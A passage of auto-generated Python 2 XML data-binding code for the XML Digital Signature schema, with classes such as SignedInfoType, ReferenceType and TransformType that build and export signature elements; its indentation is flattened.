Object_.export(outfile, level, namespace_, name_='Object', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignatureType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
if self.SignedInfo is not None:
showIndent(outfile, level)
outfile.write('SignedInfo=model_.SignedInfo(\n')
self.SignedInfo.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
if self.SignatureValue is not None:
showIndent(outfile, level)
outfile.write('SignatureValue=model_.SignatureValue(\n')
self.SignatureValue.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
if self.KeyInfo is not None:
showIndent(outfile, level)
outfile.write('KeyInfo=model_.KeyInfo(\n')
self.KeyInfo.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('Object=[\n')
level += 1
for Object_ in self.Object:
showIndent(outfile, level)
outfile.write('model_.Object(\n')
Object_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SignedInfo':
obj_ = SignedInfoType.factory()
obj_.build(child_)
self.SignedInfo = obj_
elif nodeName_ == 'SignatureValue':
obj_ = SignatureValueType.factory()
obj_.build(child_)
self.SignatureValue = obj_
elif nodeName_ == 'KeyInfo':
obj_ = KeyInfoType.factory()
obj_.build(child_)
self.KeyInfo = obj_
elif nodeName_ == 'Object':
obj_ = ObjectType.factory()
obj_.build(child_)
self.Object.append(obj_)
# end class SignatureType
class SignatureValueType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, valueOf_=None):
self.Id = _cast(None, Id)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if SignatureValueType.subclass:
return SignatureValueType.subclass(*args_, **kwargs_)
else:
return SignatureValueType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignatureValueType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureValueType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignatureValueType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignatureValueType', fromsubclass_=False, pretty_print=True):
pass
def exportLiteral(self, outfile, level, name_='SignatureValueType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class SignatureValueType
class SignedInfoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, CanonicalizationMethod=None, SignatureMethod=None, Reference=None):
self.Id = _cast(None, Id)
self.CanonicalizationMethod = CanonicalizationMethod
self.SignatureMethod = SignatureMethod
if Reference is None:
self.Reference = []
else:
self.Reference = Reference
def factory(*args_, **kwargs_):
if SignedInfoType.subclass:
return SignedInfoType.subclass(*args_, **kwargs_)
else:
return SignedInfoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_CanonicalizationMethod(self): return self.CanonicalizationMethod
def set_CanonicalizationMethod(self, CanonicalizationMethod): self.CanonicalizationMethod = CanonicalizationMethod
def get_SignatureMethod(self): return self.SignatureMethod
def set_SignatureMethod(self, SignatureMethod): self.SignatureMethod = SignatureMethod
def get_Reference(self): return self.Reference
def set_Reference(self, Reference): self.Reference = Reference
def add_Reference(self, value): self.Reference.append(value)
def insert_Reference(self, index, value): self.Reference[index] = value
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def hasContent_(self):
if (
self.CanonicalizationMethod is not None or
self.SignatureMethod is not None or
self.Reference
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignedInfoType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignedInfoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignedInfoType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignedInfoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CanonicalizationMethod is not None:
self.CanonicalizationMethod.export(outfile, level, namespace_, name_='CanonicalizationMethod', pretty_print=pretty_print)
if self.SignatureMethod is not None:
self.SignatureMethod.export(outfile, level, namespace_, name_='SignatureMethod', pretty_print=pretty_print)
for Reference_ in self.Reference:
Reference_.export(outfile, level, namespace_, name_='Reference', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignedInfoType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
def exportLiteralChildren(self, outfile, level, name_):
if self.CanonicalizationMethod is not None:
showIndent(outfile, level)
outfile.write('CanonicalizationMethod=model_.CanonicalizationMethod(\n')
self.CanonicalizationMethod.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
if self.SignatureMethod is not None:
showIndent(outfile, level)
outfile.write('SignatureMethod=model_.SignatureMethod(\n')
self.SignatureMethod.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('Reference=[\n')
level += 1
for Reference_ in self.Reference:
showIndent(outfile, level)
outfile.write('model_.Reference(\n')
Reference_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CanonicalizationMethod':
obj_ = CanonicalizationMethodType.factory()
obj_.build(child_)
self.CanonicalizationMethod = obj_
elif nodeName_ == 'SignatureMethod':
obj_ = SignatureMethodType.factory()
obj_.build(child_)
self.SignatureMethod = obj_
elif nodeName_ == 'Reference':
obj_ = ReferenceType.factory()
obj_.build(child_)
self.Reference.append(obj_)
# end class SignedInfoType
class CanonicalizationMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.Algorithm = _cast(None, Algorithm)
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CanonicalizationMethodType.subclass:
return CanonicalizationMethodType.subclass(*args_, **kwargs_)
else:
return CanonicalizationMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_Algorithm(self): return self.Algorithm
def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='CanonicalizationMethodType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='CanonicalizationMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='CanonicalizationMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='CanonicalizationMethodType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='CanonicalizationMethodType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
showIndent(outfile, level)
outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class CanonicalizationMethodType
class SignatureMethodType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, HMACOutputLength=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.Algorithm = _cast(None, Algorithm)
self.HMACOutputLength = HMACOutputLength
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if SignatureMethodType.subclass:
return SignatureMethodType.subclass(*args_, **kwargs_)
else:
return SignatureMethodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_HMACOutputLength(self): return self.HMACOutputLength
def set_HMACOutputLength(self, HMACOutputLength): self.HMACOutputLength = HMACOutputLength
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_Algorithm(self): return self.Algorithm
def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def validate_HMACOutputLengthType(self, value):
# Validate type HMACOutputLengthType, a restriction on integer.
pass
def hasContent_(self):
if (
self.HMACOutputLength is not None or
self.anytypeobjs_ or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignatureMethodType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureMethodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignatureMethodType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignatureMethodType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignatureMethodType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
showIndent(outfile, level)
outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Algorithm', node)
if value is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
self.Algorithm = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'HMACOutputLength' and child_.text is not None:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
obj_ = self.mixedclass_(MixedContainer.CategorySimple,
MixedContainer.TypeInteger, 'HMACOutputLength', ival_)
self.content_.append(obj_)
elif nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class SignatureMethodType
class ReferenceType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Type=None, Id=None, URI=None, Transforms=None, DigestMethod=None, DigestValue=None):
self.Type = _cast(None, Type)
self.Id = _cast(None, Id)
self.URI = _cast(None, URI)
self.Transforms = Transforms
self.DigestMethod = DigestMethod
self.DigestValue = DigestValue
def factory(*args_, **kwargs_):
if ReferenceType.subclass:
return ReferenceType.subclass(*args_, **kwargs_)
else:
return ReferenceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Transforms(self): return self.Transforms
def set_Transforms(self, Transforms): self.Transforms = Transforms
def get_DigestMethod(self): return self.DigestMethod
def set_DigestMethod(self, DigestMethod): self.DigestMethod = DigestMethod
def get_DigestValue(self): return self.DigestValue
def set_DigestValue(self, DigestValue): self.DigestValue = DigestValue
def get_Type(self): return self.Type
def set_Type(self, Type): self.Type = Type
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def get_URI(self): return self.URI
def set_URI(self, URI): self.URI = URI
def hasContent_(self):
if (
self.Transforms is not None or
self.DigestMethod is not None or
self.DigestValue is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='ReferenceType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ReferenceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='ReferenceType'):
if self.Type is not None and 'Type' not in already_processed:
already_processed.add('Type')
outfile.write(' Type=%s' % (self.gds_format_string(quote_attrib(self.Type).encode(ExternalEncoding), input_name='Type'), ))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
if self.URI is not None and 'URI' not in already_processed:
already_processed.add('URI')
outfile.write(' URI=%s' % (self.gds_format_string(quote_attrib(self.URI).encode(ExternalEncoding), input_name='URI'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='ReferenceType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Transforms is not None:
self.Transforms.export(outfile, level, namespace_, name_='Transforms', pretty_print=pretty_print)
if self.DigestMethod is not None:
self.DigestMethod.export(outfile, level, namespace_, name_='DigestMethod', pretty_print=pretty_print)
if self.DigestValue is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sDigestValue>%s</%sDigestValue>%s' % (namespace_, self.gds_format_base64(self.DigestValue, input_name='DigestValue'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='ReferenceType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Type is not None and 'Type' not in already_processed:
already_processed.add('Type')
showIndent(outfile, level)
outfile.write('Type="%s",\n' % (self.Type,))
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
if self.URI is not None and 'URI' not in already_processed:
already_processed.add('URI')
showIndent(outfile, level)
outfile.write('URI="%s",\n' % (self.URI,))
def exportLiteralChildren(self, outfile, level, name_):
if self.Transforms is not None:
showIndent(outfile, level)
outfile.write('Transforms=model_.Transforms(\n')
self.Transforms.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
if self.DigestMethod is not None:
showIndent(outfile, level)
outfile.write('DigestMethod=model_.DigestMethod(\n')
self.DigestMethod.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
if self.DigestValue is not None:
showIndent(outfile, level)
outfile.write('DigestValue=model_.base64Binary(\n')
self.DigestValue.exportLiteral(outfile, level, name_='DigestValue')
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Type', node)
if value is not None and 'Type' not in already_processed:
already_processed.add('Type')
self.Type = value
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
value = find_attr_value_('URI', node)
if value is not None and 'URI' not in already_processed:
already_processed.add('URI')
self.URI = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transforms':
obj_ = TransformsType.factory()
obj_.build(child_)
self.Transforms = obj_
elif nodeName_ == 'DigestMethod':
obj_ = DigestMethodType.factory()
obj_.build(child_)
self.DigestMethod = obj_
elif nodeName_ == 'DigestValue':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'DigestValue')
else:
bval_ = None
self.DigestValue = bval_
# end class ReferenceType
class TransformsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Transform=None):
if Transform is None:
self.Transform = []
else:
self.Transform = Transform
def factory(*args_, **kwargs_):
if TransformsType.subclass:
return TransformsType.subclass(*args_, **kwargs_)
else:
return TransformsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Transform(self): return self.Transform
def set_Transform(self, Transform): self.Transform = Transform
def add_Transform(self, value): self.Transform.append(value)
def insert_Transform(self, index, value): self.Transform[index] = value
def hasContent_(self):
if (
self.Transform
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='TransformsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='TransformsType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='TransformsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Transform_ in self.Transform:
Transform_.export(outfile, level, namespace_, name_='Transform', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='TransformsType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('Transform=[\n')
level += 1
for Transform_ in self.Transform:
showIndent(outfile, level)
outfile.write('model_.Transform(\n')
Transform_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Transform':
obj_ = TransformType.factory()
obj_.build(child_)
self.Transform.append(obj_)
# end class TransformsType
class TransformType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, anytypeobjs_=None, XPath=None, valueOf_=None, mixedclass_=None, content_=None):
self.Algorithm = _cast(None, Algorithm)
self.anytypeobjs_ = anytypeobjs_
if XPath is None:
self.XPath = []
else:
self.XPath = XPath
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if TransformType.subclass:
return TransformType.subclass(*args_, **kwargs_)
else:
return TransformType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_XPath(self): return self.XPath
def set_XPath(self, XPath): self.XPath = XPath
def add_XPath(self, value): self.XPath.append(value)
def insert_XPath(self, index, value): self.XPath[index] = value
def get_Algorithm(self): return self.Algorithm
def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ is not None or
self.XPath or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='TransformType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='TransformType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='TransformType', fromsubclass_=False, pretty_print=True):
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='TransformType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
showIndent(outfile, level)
